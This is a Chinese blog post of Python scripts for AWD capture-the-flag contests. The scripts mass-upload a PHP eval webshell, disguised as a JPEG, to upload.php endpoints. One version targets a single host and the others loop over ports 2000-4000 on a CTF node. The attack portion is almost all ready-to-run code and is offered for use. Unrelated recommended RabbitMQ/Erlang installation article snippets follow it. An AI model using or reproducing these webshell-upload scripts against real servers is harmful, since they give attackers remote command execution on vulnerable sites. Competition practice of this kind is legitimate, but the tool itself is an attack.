文件上传脚本(py,awd批量传马)

已于 2025-01-08 11:56:21 修改
阅读量154 收藏 1
点赞数 4
分类专栏: awd脚本 文章标签: python web安全 安全
于 2025-01-08 11:43:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_80867077/article/details/145003956
版权

一般的:

注意,这里的所有脚本都是基于数据包的,所以使用前先抓包改代码里面的参数

如果想把构筑文件内容的地方改为读取本地文件

可以将file_content那行改为

with open(r'local_file.txt', 'rb') as f:

            file_content = f.read()

import requests


url = 'http://node4.anna.nssctf.cn:28144/upload.php'
headers = {
    'Host': 'node4.anna.nssctf.cn:28144',
    'Content - Type':'multipart/form - data; boundary = ---------------------------157018622732421602881779552500',
    'Origin': 'http://node4.anna.nssctf.cn:28144',
    'Connection': 'close',
    
}
# 构建文件内容
file_content = '<?php eval(@$_POST[\'cmd\']);?>'
files = {
    'uploaded': ('2.jpg', file_content, 'image/jpeg')#mime可改,文件内容可改,记得改这行的文件名或后缀
}

response = requests.post(url, headers = headers, files = files )
print(response.text)

遍历比赛中所有存活主机的(遍历方式自己改,根据awd具体情况改):

从以下网址中遍历的话直接

a=[...,...,...,...,...,...,]

for port in a:即可

import requests


for port in range(2000, 4001):
    url = f'http://node4.anna.nssctf.cn:{port}/upload.php'
    headers = {
        'Host': f'node4.anna.nssctf.cn:{port}',
        'User - Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0',
        'Content - Type':'multipart/form - data; boundary = ---------------------------157018622732421602881779552500',
        'Connection': 'close'
    }
    # 构建文件内容
    file_content = '<?php eval(@$_POST[\'cmd\']);?>'
    files = {
        'uploaded': ('2.jpg', file_content, 'image/jpeg')
    }

    try:
        response = requests.post(url, headers = headers, files = files)
        print(f'Port {port}: {response.text}')
    except requests.RequestException as e:
        print(f'Port {port} request error: {e}')

最后还是写一个读取本地文件 的

import requests


for port in range(2000, 4001):
    url = f'http://node4.anna.nssctf.cn:{port}/upload.php'
    headers = {
        'Host': f'node4.anna.nssctf.cn:{port}',
        'Content - Type':'multipart/form - data; boundary = ---------------------------157018622732421602881779552500',
        'Origin': f'http://node4.anna.nssctf.cn:{port}',
        'Connection': 'close'
    }
    # 读取本地文件
    try:
        with open(r'local_file.txt', 'rb') as f:
            file_content = f.read()
        files = {
            'uploaded': ('2.jpg', file_content, 'image/jpeg')
        }
        try:
            response = requests.post(url, headers = headers, files = files)
            print(f'Port {port}: {response.text}')
        except requests.RequestException as e:
            print(f'Port {port} request error: {e}')
    except FileNotFoundError:
        print('本地文件未找到')
import requests


url = 'http://node4.anna.nssctf.cn:28144/upload.php'
headers = {
    'Host': 'node4.anna.nssctf.cn:28144',
    'Content - Type':'multipart/form - data; boundary = ---------------------------157018622732421602881779552500',
    'Origin': 'http://node4.anna.nssctf.cn:28144',
    'Connection': 'close'
}
try:
    with open(r'local_file.txt', 'rb') as f:
        file_content = f.read()
    files = {
        'uploaded': ('2.jpg', file_content, 'image/jpeg')
    }
    response = requests.post(url, headers = headers, files = files)
    print(response.text)
except FileNotFoundError:
    print('本地文件未找到')

RabbitMQErlang安装及其介绍
丶无题灬景恒的博客
10-14 1205
消息队列 所能承受的并发远高于 数据库 RabbitMQ消息传递模型中的核心思想是生产者从不将任何信息直接发送到队列,任何模式都是直接发送给交换机,再经交换机交给消息队列,其实简单的工作模式也是. 主流MQ:RabbitMQ,RocketMQ,ActiveMQ,Kafka ActiveMQ:最早,处理并发量较低. Kafka:并发量最高,性能高,速度快,但数据不严谨,漏发重复发消息 RocketMQ:阿里自研开发,并是开源的,速度快,并修复了Kafka前期的不严谨,但部分功能是收费的 Rab
RabbitMQ安装安装erlang依赖
欢欢的博客
12-05 1006
花费很长时间安装,综合网上资料,个人总结这个是方便和安全的方式之一。 主要参考https://www.cnblogs.com/fengyumeng/p/11133924.html 1 安装erlang依赖 下载erlang的仓库: wget http://packages.erlang-solutions.com/erlang-solutions-1....
RabbitMQ | 第1篇】ErlangRabbitMQ 的下载安装
最新发布
serendipity_hky的博客
03-09 1642
通过 “rz” 命令将两个压缩包上传到 CentOS 7 虚拟机上,对其进行解压安装。执行 rabbitmq-server,就可以启动 RabbitmqRabbitmq 有一个 Web 管理后台,是以插件的方式提供的。进入解压后的 rabbitmq 文件夹中,进入 sbin 目录,,需要哪个版本,就在地址最后修改就可以了。访问:http://虚拟机地址:15672。然后 esc,:wq 保存退出。
RabbitMQ安装_安装Erlang
m0_69572231的博客
07-19 114
RabbitMQ是使用Erlang语言编写的,所以在安装RabbitMQ前需要安装Erlang环境。4.查看Erlang是否安装成功。1.安装Erlang所需的依赖。3.安装Erlang
rabbitmqerlang安装教程
谢海睿的博客
03-04 546
我用的erlang是21.0版的,链接如下 http://www.erlang.org/downloads/21.0 我用的rabbitmq是3.7.12版的,链接如下: http://www.rabbitmq.com/install-windows.html 这个版本的选择是有自己的对应规则的,链接如下: http://www.rabbitmq.com/changelog.html 点击箭头所...
Win10下RabbitMQErlang安装教程及包下载
标题和描述中提到的知识点: 1. 安装包:在标题中提到...Erlang的环境配置是安装RabbitMQ前置条件,文件描述中提到的成功安装表明了在Windows 10系统上,按照提供的教程操作,可以顺利完成RabbitMQ安装和配置过程。
Windows10快速安装ErlangRabbitMQ教程
RabbitMQ部署在Windows平台上时,需要依赖Erlang环境,因此安装Erlang是必要的前置步骤。RabbitMQ的版本3.8是一个稳定版本,它提供了一系列的新特性,例如更高效的HTTP API、改进的管理界面以及更好的集群支持。 ...
Erlang 18.0源码包下载:RabbitMQ安装必备
由于RabbitMQ的底层实现语言就是Erlang,因此在安装RabbitMQ时需要Erlang环境作为前置条件。 5. RabbitMQ的应用场景: RabbitMQ作为一种消息队列系统,主要用于应用程序之间的解耦、异步通信、流量削峰、负载均衡...
Windows平台安装RabbitMQ必备:Erlang 24.1.7版
资源摘要信息:"Erlang_win64_24.1.rar是一个针对Windows操作系统的压缩包文件,包含了用于安装RabbitMQ消息队列中间件的Erlang运行时环境。Erlang是一个开放源代码的编程语言,主要用于构建并发、分布式和容错的系统...
RabbitMQ学习笔记:CentOS7中安装RabbitMQ集群
smart_an的专栏
07-07 869
作者简介:大家好,我是哥,前中兴通讯、美团架构师,现某互联网公司联系qq:184480602,加我进群,大家一起学习,一起进步,一起对抗互联网寒冬学习必须往深处挖,挖的越深,基础越扎实!安装rabbitmq的前提是 在CentOS7中,如果是在docker中安装,需要创建镜像创建CentOS7服务器mq2创建CentOS7服务器mq3创建CentOS7服务器mq4。
ErlangRabbitMQ
04-18
自己测试可用的版本,Erlang(otp_win64_18.1.exe)和RabbitMQrabbitmq-server-3.6.5.exe)安装包。
搭建Rabbit MQ 安装ErlangRabbitMQ
ITJAUser的博客
07-01 215
我这边是在Winddows 下面安装的。 1、安装RabbitMQ需要安装Erlang语言开发包。下载地址 http://www.erlang.org/download.html 我的百度云:链接:http://pan.baidu.com/s/1bZask2 密码:a7qy 配置环境变量 ERLANG_HOME D:\Program Files\erl7.3 添加到PATH %ERLAN...
RabbitMQ安装
PinkCoder
12-13 671
RabbitMQ安装记录
服务器安装部署RabbitMQ 1.安装Erlang(如果已经安装请忽略)
m0_73583876的博客
10-14 291
服务器安装部署RabbitMQ 1.安装Erlang(如果已经安装请忽略)
Linux下安装erlangrabbitmq
almahehe的专栏
07-19 6483
Linux下安装erlangrabbitmqerlang安装安装rabbitmqLinux下安装erlangrabbitmq一.erlang安装1.下载 地址:http://www.erlang.org/downloads/19.1 下载otp_src_19.1.tar.gz 2.在linux下解压缩 [root@s104 software]# tar -xvf otp_src
RabbitMQ安装安装erlang依赖,安装RabbitMQ
qq_36620250的博客
10-09 594
RabbitMQ 简介 RabbitMQ(消息队列/消息中间件)是流行的开源消息队列系统,是AMQP(Advanced Message Queuing Protocol高级消息队列协议)的标准实现。用Erlang语言开发。RabbitMQ具有良好的性能和实效性,同时还支持集群和负载部署,非常适用于在较大规模的分布式系统中使用。 Java常见的消息队列技术:RabbitMQ、ActiveMQ、Red...
RabbitMQ消息队列
yuanaili的博客
07-24 582
RabbitMQ 简介 RabbitMQ(消息队列/消息中间件)是流行的开源消息队列系统,是AMQP(Advanced Message Queuing Protocol高级消息队列协议)的标准实现。用Erlang语言开发。RabbitMQ具有良好的性能和实效性,同时还支持集群和负载部署,非常适用于在较大规模的分布式系统中使用。 Java常见的消息队列技术:RabbitMQ、ActiveMQ、...
安装RabbitMQErlang
qq_27198345的博客
04-01 295
安装RabbitMQErlang 安装消息队列RabbitMQ需要安装Erlang,并且需要版本对应,否则将出现各种问题。 官方给出的版本对应关系: 版本对应短息 下载对应版本的ErlangRabbitMQ安装。 下载对应版本的Erlang,并安装 下载对应版本的RabbitMQ,并安装 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值